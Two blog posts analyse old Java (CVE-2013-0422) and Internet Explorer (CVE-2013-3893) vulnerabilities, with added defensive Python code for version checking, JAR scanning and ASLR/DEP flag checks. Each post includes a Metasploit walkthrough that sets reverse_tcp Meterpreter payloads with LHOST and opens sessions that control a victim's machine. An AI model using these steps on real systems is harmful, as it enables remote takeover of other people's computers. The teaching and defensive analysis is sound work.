Thursday, September 21, 2017
Exploiting and Analysing CVE 2013 0422
The topic of this post will be a vulnerability in Oracle Java 7, Update 10 and older, that has been labeled CVE-2013-0422. It was announced by Oracle in January 2013 in a security alert, and the fix for the vulnerability apparently resulted in the default Java Security Level being raised from Medium to High. If the vulnerability is exploited, it enables the attackers to gain full control of the victim's machine without permission.
The vulnerability lies in the JmxMBeanServer class in Java. Just like most vulnerabilities related to Java, exploiting it allows attackers to run Java code outside the Java sandbox.
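Because the affected range is "Java 7, Update 10 and older", the first thing a defender wants is a way to tell, from the banner a JRE prints, whether a given install falls inside it. The following is an added example written for this post, not code from the original article or from Metasploit: it parses the pre-Java-9 `1.<major>.0_<update>` banner format and flags the affected range. The banners in `SAMPLE_BANNERS` are constructed, and the function names are my own.

```python
import re

# Highest Java 7 update the post names as affected (7u10 and older).
LAST_AFFECTED_JAVA7_UPDATE = 10

# Pre-Java-9 version strings look like 1.7.0_09 or 1.7.0_10-b18.
_VERSION_RE = re.compile(r"^1\.(\d+)\.\d+(?:_(\d+))?")


def parse_java_version(banner: str):
    """Return (major, update) from a 'java -version' style banner line such as
    'java version "1.7.0_09"'. A missing update number counts as update 0."""
    m = re.search(r'version "([^"]+)"', banner)
    if not m:
        raise ValueError(f"no version string in banner: {banner!r}")
    vm = _VERSION_RE.match(m.group(1))
    if not vm:
        raise ValueError(f"unrecognised version format: {m.group(1)!r}")
    major = int(vm.group(1))
    update = int(vm.group(2)) if vm.group(2) else 0
    return major, update


def is_affected_by_cve_2013_0422(banner: str) -> bool:
    """True only for Java 7 builds at or below the last affected update."""
    major, update = parse_java_version(banner)
    return major == 7 and update <= LAST_AFFECTED_JAVA7_UPDATE


def audit(banners):
    """Map each banner to an affected/not-affected verdict, e.g. for an inventory."""
    return {b: is_affected_by_cve_2013_0422(b) for b in banners}


# Constructed sample banners, one per case the check has to distinguish.
SAMPLE_BANNERS = [
    'java version "1.7.0_09"',       # the update the post tests with
    'java version "1.7.0_10-b18"',   # last affected update, with a build suffix
    'java version "1.7.0_11"',       # first update carrying the fix
    'java version "1.6.0_37"',       # Java 6: outside the range the post names
    'java version "1.8.0_45"',       # Java 8
]

if __name__ == "__main__":
    for banner, affected in audit(SAMPLE_BANNERS).items():
        print(f"{banner:32} affected={affected}")
```

Run this over the banner collected from each host (for example the first line of `java -version 2>&1`); only the Java 7 entries at or below update 10 come back as affected.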
Testing the exploit
In order to test the exploit we'll be using the Metasploit pentesting tool, which already contains an exploit that uses this vulnerability. Before starting the Metasploit console you should make sure that the targeted computer meets the requirements needed to successfully perform the exploit. This exploit requires the victim machine to have Java 7 Update 10 or older. In this tutorial I'll be using the Update 9 version of Java 7. You can find older versions of Java on Oracle's site.
Once you've installed the correct version of Java 7, initiate Metasploit. The exploit we need to use is java_jre17_jmxbean and in order to set it as our exploit we type set exploit/multi/browser/java_jre17_jmxbean.
The next step is finding a suitable payload that we want to drop into the target machine. To see all the payloads we can use with this exploit we use the show payloads command.

As we can see in the picture above, this exploit is compatible with a small number of payloads. Our goal is to input commands with the Meterpreter tool so type set payload java/meterpreter/reverse_tcp into the console. Once we have chosen our payload we use the show options command in order to see what other parameters we need to set.

You can notice that the LHOST parameter is required but isn't set. To configure it type set LHOST [ip address of your machine]. You can also change the SRVHOST parameter to match your IP address by using the same set command.
When you're ready to start the exploit type exploit into the console. Soon after that Metasploit will provide you with the URL you have to use to perform the exploit.

When this URL is opened by the target machine Metasploit will start exploiting it. If the exploit is successful you will see something like this:

I used the sessions command afterwards to confirm that I have successfully started the session and to see the ID of the session, because I will need it for the next command.
Type sessions -i [session Id] to start interacting with the target machine. After that you can use the Meterpreter tool to control the victim's computer.
The Analysis

If we use the Process Explorer application on the victim's computer we will notice that java.exe is started by the browser after the link is opened. It is executing the malicious code which later on gives the attacker control over the targeted machine.

You can see in the exploit's code below that the HTML page was edited to look like it's always loading. This part of the exploit isn't mandatory and is actually a diversion added in order to reduce the chances of the page being closed prematurely.

The actual exploit is called in the part of the code seen below.

The java_jre17_jmxbean exploit relies on these two Java class files, and we can study them more thoroughly by using the JD-GUI program or the JD-Eclipse plugin.
The first thing we notice in the code of Exploit.class is that a JmxMBeanServerBuilder is used to create a com.sun.jmx.mbeanserver.JmxMBeanServer instance. After that a method of that instance, called getMBeanInstantiator, is used to obtain a com.sun.jmx.mbeanserver.MBeanInstantiator instance. In other words, we have to go through the public JmxMBeanServer to get an MBeanInstantiator instance, since it is private.

The MBeanInstantiator object contains the findClass method, which is crucial for this exploit.

Once it is called, the findClass method will call the loadClass method which will give us the reference of any class in any package.

As a result of these actions, we are able to retrieve even restricted classes. If we continue examining the Exploit class we will see that the attackers used this method to get the sun.org.mozilla.javascript.internal.Context class and the sun.org.mozilla.javascript.internal.GeneratedClassLoader class.

Afterwards the constructor methods of these classes are called in order to create their instances. The Context instance's createClassLoader method is invoked, and it enables the defineClass method of the GeneratedClassLoader instance to define and call any class that will, once executed, disable the Java security checks. That malicious class is B.class, the second file that was loaded by Metasploit.
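The chain just described (JmxMBeanServerBuilder, JmxMBeanServer, MBeanInstantiator, then the Rhino Context and GeneratedClassLoader classes) leaves a recognisable fingerprint in a class file, because every class a method references or names ends up as a string in the class's constant pool. The example below is added for this post and is not code from the original article or from Metasploit: it unpacks a JAR and reports class entries that reference several of those internal classes together, which is how a defender could triage a JAR pulled from a proxy cache or mail gateway. The sample JAR is constructed in memory (its "class files" are only a magic number plus the strings a real constant pool would hold), and all function names are my own.

```python
import io
import zipfile

# Internal classes the post's Exploit.class chains together, in JVM binary form.
# Direct references use slashes; names passed as strings to findClass use dots,
# so both spellings are checked.
SUSPICIOUS_REFERENCES = (
    b"com/sun/jmx/mbeanserver/JmxMBeanServerBuilder",
    b"com/sun/jmx/mbeanserver/JmxMBeanServer",
    b"com/sun/jmx/mbeanserver/MBeanInstantiator",
    b"sun/org/mozilla/javascript/internal/Context",
    b"sun/org/mozilla/javascript/internal/GeneratedClassLoader",
)

CLASS_MAGIC = b"\xca\xfe\xba\xbe"


def scan_class_bytes(data: bytes):
    """Return the suspicious references present in one class file's bytes.
    Constant-pool strings are modified UTF-8, so a plain byte search is enough."""
    hits = []
    for ref in SUSPICIOUS_REFERENCES:
        if ref in data or ref.replace(b"/", b".") in data:
            hits.append(ref.decode())
    return tuple(hits)


def scan_jar(jar_bytes: bytes, threshold: int = 2):
    """Scan every .class entry in a JAR and return {entry: hits} for entries that
    reference at least `threshold` distinct classes from the list above. A single
    hit is not reported, since JMX itself is a legitimate API."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for info in jar.infolist():
            if not info.filename.endswith(".class"):
                continue
            data = jar.read(info)
            if data[:4] != CLASS_MAGIC:  # not a class file at all
                continue
            hits = scan_class_bytes(data)
            if len(hits) >= threshold:
                findings[info.filename] = hits
    return findings


def build_sample_jar() -> bytes:
    """Constructed sample JAR: a fake Exploit.class carrying the references above
    (dotted form for the two Rhino classes, as findClass would see them), plus a
    benign applet class. Not real compiled classes."""
    rhino_as_strings = b"\x00".join(
        r.replace(b"/", b".") for r in SUSPICIOUS_REFERENCES[3:]
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(
            "Exploit.class",
            CLASS_MAGIC + b"\x00".join(SUSPICIOUS_REFERENCES[:3]) + b"\x00" + rhino_as_strings,
        )
        jar.writestr("Hello.class", CLASS_MAGIC + b"java/lang/Object\x00java/applet/Applet")
        jar.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
    return buf.getvalue()


if __name__ == "__main__":
    for entry, hits in scan_jar(build_sample_jar()).items():
        print(entry, "->", ", ".join(hits))
```

The threshold matters: JmxMBeanServer on its own is ordinary management code, but an applet that also names the Rhino Context and GeneratedClassLoader classes has no legitimate reason to. Against real JARs, feed `scan_jar` the file bytes instead of `build_sample_jar()`.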

To sum up, the exploit relies on avoiding Java's restrictions and being able to call methods which you shouldn't be able to call. In Java exploits, getting out of the sandbox is the main objective. Oracle is trying to counter this by improving security checks when methods are executed and, of course, by trying to make sure that those methods have fewer flaws which can lead to vulnerabilities.
Friday, September 8, 2017
Exploiting and Analysing CVE 2013 3893
On September 17, 2013 the Microsoft Security Response Center announced a Security Advisory about a new zero-day vulnerability that had been spotted attacking Japanese financial companies. On October 8 they expanded that advisory with MS13-080, a bulletin containing information about an update that fixes the vulnerability that was exploited. The vulnerability was labeled CVE-2013-3893. It's a use-after-free vulnerability found in Internet Explorer's dynamic link library mshtml.dll, in the SetMouseCapture functionality, and it allows remote code execution if exploited properly. The exploit targeted Internet Explorer 6 through 11 running on Windows XP or Windows 7 which also had Microsoft Office 2007 or Microsoft Office 2010 installed.
The term use-after-free bug in this case means that, by accessing a web page with malicious code, Internet Explorer can be manipulated into allocating memory and then freeing it even though it is still referenced. The freed memory can then be controlled by the attacker. When Internet Explorer executes commands from that memory there is a possibility that it will execute instructions created by the attacker. This bug usually results in corruption of data and the program just crashes, but if it is used by a hacker it may allow him to gain complete control of the system.
Another term we should highlight is remote code execution. It is associated with CVE-2013-3893 because the exploit allowed attackers to control the victim computers over the network. The victim only has to open the link to the malicious page and the attacker will instantly have control of the victim's computer and access to its memory.
The vulnerability also implies that Microsoft Office 2007 or 2010 is installed, because it contains the hxds.dll module which isn't compatible with ASLR and can be used to bypass it.
Exploiting with Metasploit
This section is going to be a simple tutorial on how to use Metasploit to exploit this vulnerability. The tutorial is for beginners and readers who have never used Metasploit before, and basically no programming skills are required to perform this exploit. First off, we should define some basic requirements that have to be met in order to perform a successful attack. The Metasploit exploit is a bit more restricted than the original exploit. The computer you wish to attack has to have Internet Explorer 9 running on Windows 7 and also has to have Office 2007 or Office 2010 installed.
If you haven't already, you should download the free Metasploit Community edition here. Keep in mind that you should turn off both your antivirus and firewall while using Metasploit.
When you are done with the update, start your Metasploit Console and wait a bit for it to initialize. If you get confused or don't know what command to use at some point, just type help into the console and you will see a list of commands that you can use along with their explanations.
To start off, type use exploit/windows/browser/ie_setmousecapture_uaf in order to define that you're using the IE setmousecapture exploit. When you don't know the name of the exploit you can use the search command. For example, I found this exploit by typing search setmouse into the console:

Once you've set your exploit you should choose a payload that will be dropped onto the vulnerable computer. To see a list of compatible payloads type show payloads into the console. Once you've found a suitable payload you can use the set command in order to select it. In this tutorial my aim is to be able to input commands with the Meterpreter tool, so I've typed in set payload windows/meterpreter/reverse_tcp.

For all additional exploit and payload options you can type in show options and you will see something like this:

For this particular payload we have to define the LHOST (the local host's address), so we will type in set LHOST [ip address of your machine]. If you don't know your IP address then just use ipconfig. You should also redefine the SRVHOST by typing in set SRVHOST [ip address of your machine].
If you just want to test the exploit and don't care about gaining access to the shell on the victim's machine you can use the windows/messagebox payload, which will result in a message box appearing on the victim's machine. You can also use the windows/download_exec payload to put an executable file on the targeted machine.
Once you're ready to start your exploit just type in exploit. If you have done everything correctly you will see this in your console:

When the exploit starts you will be given a URL. Retype that address into the Internet Explorer address bar and Metasploit is going to begin attacking it. Shortly after, you should receive a message that a session has been opened. If you want to check which sessions you have open, type in sessions.

After that you just have to type in sessions -i 1 to start interacting with the victim's shell.
You can now use Meterpreter to control the victim's computer and inspect their data. You can see a list of commands you can use in Meterpreter at this link.
If your exploit isn't working properly there are a few things you should check. First off, make sure your victim's system meets all of the requirements. You should also make sure you're using the 32-bit version of IE9 and not the 64-bit version. If the console is telling you that you're using the wrong browser even though you're using IE9 32-bit, check whether Internet Explorer is running the page in IE7 compatibility mode. You can check that by clicking Tools in the Menu Bar and then selecting Compatibility View settings. If that is the case just remove the page from the compatibility list.
Analysing the Vulnerability and the Exploit
The best way to analyse an exploit is to use a debugger. The most frequently used debugger in pentesting is IDA Pro. It can help us figure out how the exploit actually works and how it affects the memory. The vulnerability lies in the setMouseCapture() function of Internet Explorer, which is usually used to take control over mouse actions in the browser. The exploit creates two elements on the malicious page, one parent and one child element, and then registers an onlosecapture() event handler for the parent element that involves a document.write() call. When the setCapture() function for the child element is called it will trigger that event, which will result in an arbitrary memory release by using the document.write() function.

The memory that was used by the document.write() function will stay referenced and it will later be passed on to mshtml.dll, resulting in IE9 crashing in mshtml.dll due to an incorrect memory read.

This incorrect memory access is the basis of the exploit, because the attackers can now make our system call a memory address controlled by them. However, ASLR and DEP make it hard to manipulate memory and call malicious functions.
One way ASLR can be worked around is heap spraying. It allows the attackers to fill large chunks of memory with their data and increases the chance that their code will be reached.

Another problem the hackers had to address is that Windows 7 won't execute code if it is located in a part of memory marked NX (no execute). Furthermore, because of ASLR, they don't know which segments of memory are currently in use and are marked as executable.
This problem is bypassed by using hxds.dll (a part of Microsoft Office), which isn't compatible with ASLR. Since it isn't in a random part of our memory the attackers can easily locate it, and they can also easily make IE load it.
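Whether a module participates in ASLR is recorded in its PE header: the `DllCharacteristics` field of the optional header carries the DYNAMIC_BASE (0x0040) opt-in flag, and NX_COMPAT (0x0100) likewise records DEP compatibility. A module without DYNAMIC_BASE loads at its preferred base, which is exactly the property of hxds.dll that this post describes. The example below is added for this post and is not code from the original article, from Metasploit or from Microsoft: it parses those flags from an image's bytes so a defender can inventory which DLLs on a system (or in a software package) opt out of ASLR or DEP. The `build_minimal_pe` helper and the function names are my own; it builds a constructed, non-loadable stand-in image carrying only the header fields the check reads.

```python
import struct

# IMAGE_DLLCHARACTERISTICS flags from the PE/COFF specification.
DYNAMIC_BASE = 0x0040   # image can be relocated at load time (ASLR opt-in)
NX_COMPAT = 0x0100      # image declares itself compatible with DEP

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def read_dll_characteristics(pe: bytes) -> int:
    """Parse DllCharacteristics from a PE image's optional header.
    Walks DOS header -> e_lfanew -> PE signature -> COFF header -> optional header."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image (missing MZ signature)")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image (missing PE signature)")
    coff = e_lfanew + 4
    size_of_optional = struct.unpack_from("<H", pe, coff + 16)[0]
    optional = coff + 20  # COFF file header is 20 bytes
    if size_of_optional < 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    magic = struct.unpack_from("<H", pe, optional)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers.
    return struct.unpack_from("<H", pe, optional + 70)[0]


def mitigation_report(pe: bytes) -> dict:
    """Summarise the two mitigations this post discusses for one image."""
    flags = read_dll_characteristics(pe)
    return {"aslr": bool(flags & DYNAMIC_BASE), "dep": bool(flags & NX_COMPAT)}


def build_minimal_pe(dll_characteristics: int) -> bytes:
    """Constructed stand-in for a DLL: DOS header, PE signature, COFF header and a
    224-byte PE32 optional header with only the fields this check reads. Not loadable."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header right after the DOS header
    # Machine=i386, 0 sections, timestamp/symtab zero, SizeOfOptionalHeader=224,
    # Characteristics: executable image | 32-bit | DLL
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    optional = bytearray(224)
    struct.pack_into("<H", optional, 0, PE32_MAGIC)
    struct.pack_into("<H", optional, 70, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(optional)


if __name__ == "__main__":
    # Side by side: a module built without the flags, and one with both mitigations.
    for label, flags in (("no mitigations", 0), ("aslr+dep", DYNAMIC_BASE | NX_COMPAT)):
        print(label, mitigation_report(build_minimal_pe(flags)))
```

To audit a real module, pass the file's bytes (for example `open(path, "rb").read()`) to `mitigation_report`. The flag only records the image's opt-in; on Windows 7 a module lacking DYNAMIC_BASE is left at its preferred base, which is why a single such DLL in the process undoes the protection for everything else.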

Conclusion
As we can see, this exploit uses multiple vulnerable applications on Windows. By combining the bug in IE's mshtml.dll with hxds.dll's incompatibility with ASLR the attackers managed to gain complete access to the victim's system. This example shows us how a few seemingly harmless bugs can be combined and exploited by resourceful hackers, and how imaginative hackers really are when it comes to exploits.